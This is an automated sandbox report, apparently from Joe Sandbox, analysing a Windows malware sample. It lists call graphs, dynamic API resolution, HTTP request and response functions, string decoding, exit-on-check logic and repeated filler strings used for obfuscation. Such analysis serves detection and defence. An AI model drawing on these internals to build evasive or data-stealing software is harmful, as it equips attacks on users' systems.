684610 2 API calls 38817->38818 38819 6840b3 38818->38819 38820 684610 2 API calls 38819->38820 38821 6840cc 38820->38821 38822 684610 2 API calls 38821->38822 38823 6840e5 38822->38823 38824 684610 2 API calls 38823->38824 38825 6840fe 38824->38825 38826 684610 2 API calls 38825->38826 38827 684117 38826->38827 38828 684610 2 API calls 38827->38828 38829 684130 38828->38829 38830 684610 2 API calls 38829->38830 38831 684149 38830->38831 38832 684610 2 API calls 38831->38832 38833 684162 38832->38833 38834 684610 2 API calls 38833->38834 38835 68417b 38834->38835 38836 684610 2 API calls 38835->38836 38837 684194 38836->38837 38838 684610 2 API calls 38837->38838 38839 6841ad 38838->38839 38840 684610 2 API calls 38839->38840 38841 6841c6 38840->38841 38842 684610 2 API calls 38841->38842 38843 6841df 38842->38843 38844 684610 2 API calls 38843->38844 38845 6841f8 38844->38845 38846 684610 2 API calls 38845->38846 38847 684211 38846->38847 38848 684610 2 API calls 38847->38848 38849 68422a 38848->38849 38850 684610 2 API calls 38849->38850 38851 684243 38850->38851 38852 684610 2 API calls 38851->38852 38853 68425c 38852->38853 38854 684610 2 API calls 38853->38854 38855 684275 38854->38855 38856 684610 2 API calls 38855->38856 38857 68428e 38856->38857 38858 684610 2 API calls 38857->38858 38859 6842a7 38858->38859 38860 684610 2 API calls 38859->38860 38861 6842c0 38860->38861 38862 684610 2 API calls 38861->38862 38863 6842d9 38862->38863 38864 684610 2 API calls 38863->38864 38865 6842f2 38864->38865 38866 684610 2 API calls 38865->38866 38867 68430b 38866->38867 38868 684610 2 API calls 38867->38868 38869 684324 38868->38869 38870 684610 2 API calls 38869->38870 38871 68433d 38870->38871 38872 684610 2 API calls 38871->38872 38873 684356 38872->38873 38874 684610 2 API calls 38873->38874 38875 68436f 38874->38875 38876 684610 2 API calls 38875->38876 38877 684388 38876->38877 38878 684610 2 API calls 38877->38878 38879 6843a1 38878->38879 38880 684610 2 API calls 38879->38880 38881 6843ba 38880->38881 38882 684610 2 API calls 38881->38882 38883 6843d3 38882->38883 38884 684610 2 API calls 38883->38884 38885 6843ec 38884->38885 38886 684610 2 API calls 38885->38886 38887 684405 38886->38887 38888 684610 2 API calls 38887->38888 38889 68441e 38888->38889 38890 684610 2 API calls 38889->38890 38891 684437 38890->38891 38892 684610 2 API calls 38891->38892 38893 684450 38892->38893 38894 684610 2 API calls 38893->38894 38895 684469 38894->38895 38896 684610 2 API calls 38895->38896 38897 684482 38896->38897 38898 684610 2 API calls 38897->38898 38899 68449b 38898->38899 38900 684610 2 API calls 38899->38900 38901 6844b4 38900->38901 38902 684610 2 API calls 38901->38902 38903 6844cd 38902->38903 38904 684610 2 API calls 38903->38904 38905 6844e6 38904->38905 38906 684610 2 API calls 38905->38906 38907 6844ff 38906->38907 38908 684610 2 API calls 38907->38908 38909 684518 38908->38909 38910 684610 2 API calls 38909->38910 38911 684531 38910->38911 38912 684610 2 API calls 38911->38912 38913 68454a 38912->38913 38914 684610 2 API calls 38913->38914 38915 684563 38914->38915 38916 684610 2 API calls 38915->38916 38917 68457c 38916->38917 38918 684610 2 API calls 38917->38918 38919 684595 38918->38919 38920 684610 2 API calls 38919->38920 38921 6845ae 38920->38921 38922 684610 2 API calls 38921->38922 38923 6845c7 38922->38923 38924 684610 2 API calls 38923->38924 38925 6845e0 38924->38925 38926 684610 2 API calls 38925->38926 38927 6845f9 38926->38927 38928 699f20 38927->38928 38929 699f30 43 API calls 38928->38929 38930 69a346 8 API calls 38928->38930 38929->38930 38931 69a3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38930->38931 38932 69a456 38930->38932 38931->38932 38933 69a463 8 API calls 38932->38933 38934 69a526 38932->38934 38933->38934 38935 69a5a8 38934->38935 38936 69a52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38934->38936 38937 69a5b5 6 API calls 38935->38937 38938 69a647 38935->38938 38936->38935 38937->38938 38939 69a72f 38938->38939 38940 69a654 9 API calls 38938->38940 38941 69a738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38939->38941 38942 69a7b2 38939->38942 38940->38939 38941->38942 38943 69a7bb GetProcAddress GetProcAddress 38942->38943 38944 69a7ec 38942->38944 38943->38944 38945 69a825 38944->38945 38946 69a7f5 GetProcAddress GetProcAddress 38944->38946 38947 69a922 38945->38947 38948 69a832 10 API calls 38945->38948 38946->38945 38949 69a92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38947->38949 38950 69a98d 38947->38950 38948->38947 38949->38950 38951 69a9ae 38950->38951 38952 69a996 GetProcAddress 38950->38952 38953 695ef3 38951->38953 38954 69a9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38951->38954 38952->38951 38955 681590 38953->38955 38954->38953 39225 6816b0 38955->39225 38958 69aab0 lstrcpy 38959 6815b5 38958->38959 38960 69aab0 lstrcpy 38959->38960 38961 6815c7 38960->38961 38962 69aab0 lstrcpy 38961->38962 38963 6815d9 38962->38963 38964 69aab0 lstrcpy 38963->38964 38965 681663 38964->38965 38966 695760 38965->38966 38967 695771 38966->38967 38968 69ab30 2 API calls 38967->38968 38969 69577e 38968->38969 38970 69ab30 2 API calls 38969->38970 38971 69578b 38970->38971 38972 69ab30 2 API calls 38971->38972 38973 695798 38972->38973 38974 69aa50 lstrcpy 38973->38974 38975 6957a5 38974->38975 38976 69aa50 lstrcpy 38975->38976 38977 6957b2 38976->38977 38978 69aa50 lstrcpy 38977->38978 38979 6957bf 38978->38979 38980 69aa50 lstrcpy 38979->38980 39017 6957cc 38980->39017 38981 695440 20 API calls 38981->39017 38982 695893 StrCmpCA 38982->39017 38983 6958f0 StrCmpCA 38984 695a2c 38983->38984 38983->39017 38985 69abb0 lstrcpy 38984->38985 38986 695a38 38985->38986 38987 69ab30 2 API calls 38986->38987 38990 695a46 38987->38990 38988 69aa50 lstrcpy 38988->39017 38989 69ab30 lstrlen lstrcpy 38989->39017 38992 69ab30 2 API calls 38990->38992 38991 695aa6 StrCmpCA 38993 695be1 38991->38993 38991->39017 38995 695a55 38992->38995 38994 69abb0 lstrcpy 38993->38994 38996 695bed 38994->38996 38997 6816b0 lstrcpy 38995->38997 38998 69ab30 2 API calls 38996->38998 39018 695a61 38997->39018 38999 695bfb 38998->38999 39001 69ab30 2 API calls 38999->39001 39000 695c5b StrCmpCA 39002 695c78 39000->39002 39003 695c66 Sleep 39000->39003 39005 695c0a 39001->39005 39006 69abb0 lstrcpy 39002->39006 39003->39017 39004 69aab0 lstrcpy 39004->39017 39007 6816b0 lstrcpy 39005->39007 39008 695c84 39006->39008 39007->39018 39010 69ab30 2 API calls 39008->39010 39009 681590 lstrcpy 39009->39017 39011 695c93 39010->39011 39013 69ab30 2 API calls 39011->39013 39012 695510 25 API calls 39012->39017 39014 695ca2 39013->39014 39016 6816b0 lstrcpy 39014->39016 39015 6959da StrCmpCA 39015->39017 39016->39018 39017->38981 39017->38982 39017->38983 39017->38988 39017->38989 39017->38991 39017->39000 39017->39004 39017->39009 39017->39012 39017->39015 39019 695b8f StrCmpCA 39017->39019 39020 69abb0 lstrcpy 39017->39020 39018->38073 39019->39017 39020->39017 39022 6976dc 39021->39022 39023 6976e3 GetVolumeInformationA 39021->39023 39022->39023 39024 697721 39023->39024 39025 69778c GetProcessHeap RtlAllocateHeap 39024->39025 39026 6977a9 39025->39026 39027 6977b8 wsprintfA 39025->39027 39028 69aa50 lstrcpy 39026->39028 39029 69aa50 lstrcpy 39027->39029 39030 695ff7 39028->39030 39029->39030 39030->38094 39032 69aab0 lstrcpy 39031->39032 39033 6848e9 39032->39033 39234 684800 39033->39234 39035 6848f5 39036 69aa50 lstrcpy 39035->39036 39037 684927 39036->39037 39038 69aa50 lstrcpy 39037->39038 39039 684934 39038->39039 39040 69aa50 lstrcpy 39039->39040 39041 684941 39040->39041 39042 69aa50 lstrcpy 39041->39042 39043 68494e 39042->39043 39044 69aa50 lstrcpy 39043->39044 39045 68495b InternetOpenA StrCmpCA 39044->39045 39046 684994 39045->39046 39047 684f1b InternetCloseHandle 39046->39047 39240 698cf0 39046->39240 39049 684f38 39047->39049 39255 68a210 CryptStringToBinaryA 39049->39255 39050 6849b3 39248 69ac30 39050->39248 39053 6849c6 39055 69abb0 lstrcpy 39053->39055 39060 6849cf 39055->39060 39056 69ab30 2 API calls 39057 684f55 39056->39057 39059 69acc0 4 API calls 39057->39059 39058 684f77 ctype 39062 69aab0 lstrcpy 39058->39062 39061 684f6b 39059->39061 39064 69acc0 4 API calls 39060->39064 39063 69abb0 lstrcpy 39061->39063 39075 684fa7 39062->39075 39063->39058 39065 6849f9 39064->39065 39066 69abb0 lstrcpy 39065->39066 39067 684a02 39066->39067 39068 69acc0 4 API calls 39067->39068 39069 684a21 39068->39069 39070 69abb0 lstrcpy 39069->39070 39071 684a2a 39070->39071 39072 69ac30 3 API calls 39071->39072 39073 684a48 39072->39073 39074 69abb0 lstrcpy 39073->39074 39076 684a51 39074->39076 39075->38097 39077 69acc0 4 API calls 39076->39077 39078 684a70 39077->39078 39079 69abb0 lstrcpy 39078->39079 39080 684a79 39079->39080 39081 69acc0 4 API calls 39080->39081 39082 684a98 39081->39082 39083 69abb0 lstrcpy 39082->39083 39084 684aa1 39083->39084 39085 69acc0 4 API calls 39084->39085 39086 684acd 39085->39086 39087 69ac30 3 API calls 39086->39087 39088 684ad4 39087->39088 39089 69abb0 lstrcpy 39088->39089 39090 684add 39089->39090 39091 684af3 InternetConnectA 39090->39091 39091->39047 39092 684b23 HttpOpenRequestA 39091->39092 39094 684b78 39092->39094 39095 684f0e InternetCloseHandle 39092->39095 39096 69acc0 4 API calls 39094->39096 39095->39047 39097 684b8c 39096->39097 39098 69abb0 lstrcpy 39097->39098 39099 684b95 39098->39099 39100 69ac30 3 API calls 39099->39100 39101 684bb3 39100->39101 39102 69abb0 lstrcpy 39101->39102 39103 684bbc 39102->39103 39104 69acc0 4 API calls 39103->39104 39105 684bdb 39104->39105 39106 69abb0 lstrcpy 39105->39106 39107 684be4 39106->39107 39108 69acc0 4 API calls 39107->39108 39109 684c05 39108->39109 39110 69abb0 lstrcpy 39109->39110 39111 684c0e 39110->39111 39112 69acc0 4 API calls 39111->39112 39113 684c2e 39112->39113 39114 69abb0 lstrcpy 39113->39114 39115 684c37 39114->39115 39116 69acc0 4 API calls 39115->39116 39117 684c56 39116->39117 39118 69abb0 lstrcpy 39117->39118 39119 684c5f 39118->39119 39120 69ac30 3 API calls 39119->39120 39121 684c7d 39120->39121 39122 69abb0 lstrcpy 39121->39122 39123 684c86 39122->39123 39124 69acc0 4 API calls 39123->39124 39125 684ca5 39124->39125 39126 69abb0 lstrcpy 39125->39126 39127 684cae 39126->39127 39128 69acc0 4 API calls 39127->39128 39129 684ccd 39128->39129 39130 69abb0 lstrcpy 39129->39130 39131 684cd6 39130->39131 39132 69ac30 3 API calls 39131->39132 39133 684cf4 39132->39133 39134 69abb0 lstrcpy 39133->39134 39135 684cfd 39134->39135 39136 69acc0 4 API calls 39135->39136 39137 684d1c 39136->39137 39138 69abb0 lstrcpy 39137->39138 39139 684d25 39138->39139 39140 69acc0 4 API calls 39139->39140 39141 684d46 39140->39141 39142 69abb0 lstrcpy 39141->39142 39143 684d4f 39142->39143 39144 69acc0 4 API calls 39143->39144 39145 684d6f 39144->39145 39146 69abb0 lstrcpy 39145->39146 39147 684d78 39146->39147 39148 69acc0 4 API calls 39147->39148 39149 684d97 39148->39149 39150 69abb0 lstrcpy 39149->39150 39151 684da0 39150->39151 39152 69ac30 3 API calls 39151->39152 39153 684dbe 39152->39153 39154 69abb0 lstrcpy 39153->39154 39155 684dc7 39154->39155 39156 69aa50 lstrcpy 39155->39156 39157 684de2 39156->39157 39158 69ac30 3 API calls 39157->39158 39159 684e03 39158->39159 39160 69ac30 3 API calls 39159->39160 39161 684e0a 39160->39161 39162 69abb0 lstrcpy 39161->39162 39163 684e16 39162->39163 39164 684e37 lstrlen 39163->39164 39165 684e4a 39164->39165 39166 684e53 lstrlen 39165->39166 39254 69ade0 39166->39254 39168 684e63 HttpSendRequestA 39169 684e82 InternetReadFile 39168->39169 39170 684eb7 InternetCloseHandle 39169->39170 39175 684eae 39169->39175 39172 69ab10 39170->39172 39172->39095 39173 69acc0 4 API calls 39173->39175 39174 69abb0 lstrcpy 39174->39175 39175->39169 39175->39170 39175->39173 39175->39174 39261 69ade0 39176->39261 39178 691a14 StrCmpCA 39179 691a1f ExitProcess 39178->39179 39190 691a27 39178->39190 39180 691c12 39180->38099 39181 691aad StrCmpCA 39181->39190 39182 691acf StrCmpCA 39182->39190 39183 691b41 StrCmpCA 39183->39190 39184 691ba1 StrCmpCA 39184->39190 39185 691bc0 StrCmpCA 39185->39190 39186 691b63 StrCmpCA 39186->39190 39187 691b82 StrCmpCA 39187->39190 39188 691afd StrCmpCA 39188->39190 39189 691b1f StrCmpCA 39189->39190 39190->39180 39190->39181 39190->39182 39190->39183 39190->39184 39190->39185 39190->39186 39190->39187 39190->39188 39190->39189 39191 69ab30 lstrlen lstrcpy 39190->39191 39191->39190 39192->38105 39193->38107 39194->38113 39195->38115 39196->38121 39197->38123 39198->38127 39199->38131 39200->38135 39201->38141 39202->38143 39203->38147 39204->38161 39205->38164 39206->38165 39207->38160 39208->38165 39209->38180 39210->38167 39211->38171 39212->38172 39213->38177 39214->38182 39215->38184 39216->38191 39217->38197 39218->38218 39219->38222 39220->38221 39221->38217 39222->38221 39223->38231 39226 69aab0 lstrcpy 39225->39226 39227 6816c3 39226->39227 39228 69aab0 lstrcpy 39227->39228 39229 6816d5 39228->39229 39230 69aab0 lstrcpy 39229->39230 39231 6816e7 39230->39231 39232 69aab0 lstrcpy 39231->39232 39233 6815a3 39232->39233 39233->38958 39235 684816 39234->39235 39236 684888 lstrlen 39235->39236 39260 69ade0 39236->39260 39238 684898 InternetCrackUrlA 39239 6848b7 39238->39239 39239->39035 39241 69aa50 lstrcpy 39240->39241 39242 698d04 39241->39242 39243 69aa50 lstrcpy 39242->39243 39244 698d12 GetSystemTime 39243->39244 39246 698d29 39244->39246 39245 69aab0 lstrcpy 39247 698d8c 39245->39247 39246->39245 39247->39050 39249 69ac41 39248->39249 39250 69ac98 39249->39250 39252 69ac78 lstrcpy lstrcat 39249->39252 39251 69aab0 lstrcpy 39250->39251 39253 69aca4 39251->39253 39252->39250 39253->39053 39254->39168 39256 68a249 LocalAlloc 39255->39256 39257 684f3e 39255->39257 39256->39257 39258 68a264 CryptStringToBinaryA 39256->39258 39257->39056 39257->39058 39258->39257 39259 68a289 LocalFree 39258->39259 39259->39257 39260->39238 39261->39178

                                    Executed Functions

                                    Function 00699BB0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 660 699bb0-699bc4 call 699aa0 663 699bca-699dde call 699ad0 GetProcAddress * 21 660->663 664 699de3-699e42 LoadLibraryA * 5 660->664 663->664 665 699e5d-699e64 664->665 666 699e44-699e58 GetProcAddress 664->666 669 699e96-699e9d 665->669 670 699e66-699e91 GetProcAddress * 2 665->670 666->665 671 699eb8-699ebf 669->671 672 699e9f-699eb3 GetProcAddress 669->672 670->669 673 699ed9-699ee0 671->673 674 699ec1-699ed4 GetProcAddress 671->674 672->671 675 699f11-699f12 673->675 676 699ee2-699f0c GetProcAddress * 2 673->676 674->673 676->675
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,01420660), ref: 00699BF1
                                    • GetProcAddress.KERNEL32(75900000,014206A8), ref: 00699C0A
                                    • GetProcAddress.KERNEL32(75900000,014207C8), ref: 00699C22
                                    • GetProcAddress.KERNEL32(75900000,014205B8), ref: 00699C3A
                                    • GetProcAddress.KERNEL32(75900000,014207E0), ref: 00699C53
                                    • GetProcAddress.KERNEL32(75900000,01429198), ref: 00699C6B
                                    • GetProcAddress.KERNEL32(75900000,01416840), ref: 00699C83
                                    • GetProcAddress.KERNEL32(75900000,01416940), ref: 00699C9C
                                    • GetProcAddress.KERNEL32(75900000,01420828), ref: 00699CB4
                                    • GetProcAddress.KERNEL32(75900000,014206C0), ref: 00699CCC
                                    • GetProcAddress.KERNEL32(75900000,01420648), ref: 00699CE5
                                    • GetProcAddress.KERNEL32(75900000,014207F8), ref: 00699CFD
                                    • GetProcAddress.KERNEL32(75900000,01416820), ref: 00699D15
                                    • GetProcAddress.KERNEL32(75900000,01420840), ref: 00699D2E
                                    • GetProcAddress.KERNEL32(75900000,01420570), ref: 00699D46
                                    • GetProcAddress.KERNEL32(75900000,014169C0), ref: 00699D5E
                                    • GetProcAddress.KERNEL32(75900000,01420588), ref: 00699D77
                                    • GetProcAddress.KERNEL32(75900000,014208D0), ref: 00699D8F
                                    • GetProcAddress.KERNEL32(75900000,01416A00), ref: 00699DA7
                                    • GetProcAddress.KERNEL32(75900000,01420858), ref: 00699DC0
                                    • GetProcAddress.KERNEL32(75900000,014169E0), ref: 00699DD8
                                    • LoadLibraryA.KERNEL32(014208E8,?,00696CA0), ref: 00699DEA
                                    • LoadLibraryA.KERNEL32(01420900,?,00696CA0), ref: 00699DFB
                                    • LoadLibraryA.KERNEL32(01420918,?,00696CA0), ref: 00699E0D
                                    • LoadLibraryA.KERNEL32(01420870,?,00696CA0), ref: 00699E1F
                                    • LoadLibraryA.KERNEL32(01420888,?,00696CA0), ref: 00699E30
                                    • GetProcAddress.KERNEL32(75070000,014208A0), ref: 00699E52
                                    • GetProcAddress.KERNEL32(75FD0000,014208B8), ref: 00699E73
                                    • GetProcAddress.KERNEL32(75FD0000,01429578), ref: 00699E8B
                                    • GetProcAddress.KERNEL32(75A50000,01429518), ref: 00699EAD
                                    • GetProcAddress.KERNEL32(74E50000,01416860), ref: 00699ECE
                                    • GetProcAddress.KERNEL32(76E80000,01429068), ref: 00699EEF
                                    • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00699F06
                                    Strings
                                    • NtQueryInformationProcess, xrefs: 00699EFA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: NtQueryInformationProcess
                                    • API String ID: 2238633743-2781105232
                                    • Opcode ID: 898f0577568eb19f3667fb1c32df82860c70f53047aaa47105f2e0c0dea7be6c
                                    • Instruction ID: 6f8115ad5b996debd7fbf299fa22e98f4fc3afb03d63959ef2fc3be4c91be023
                                    • Opcode Fuzzy Hash: 898f0577568eb19f3667fb1c32df82860c70f53047aaa47105f2e0c0dea7be6c
                                    • Instruction Fuzzy Hash: 39A1FBB553C7009FC784DFEAFC88956BBB9A749703B50861AB919C3670D734AA40EF60
                                    Function 00684610 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 764 684610-6846e5 RtlAllocateHeap 781 6846f0-6846f6 764->781 782 6846fc-68479a 781->782 783 68479f-6847f9 VirtualProtect 781->783 782->781
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0068465F
                                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 006847EC
                                    Strings
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684688
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006847CB
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0068476E
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006846B2
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684667
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684728
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684763
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684693
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0068471D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684617
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684707
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684712
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684638
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006846FC
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0068462D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0068467D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0068479F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006846A7
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684622
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684643
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684784
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006847AA
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006846BD
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684779
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006846C8
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006847C0
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684672
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006847B5
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006846D3
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0068478F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeapProtectVirtual
                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 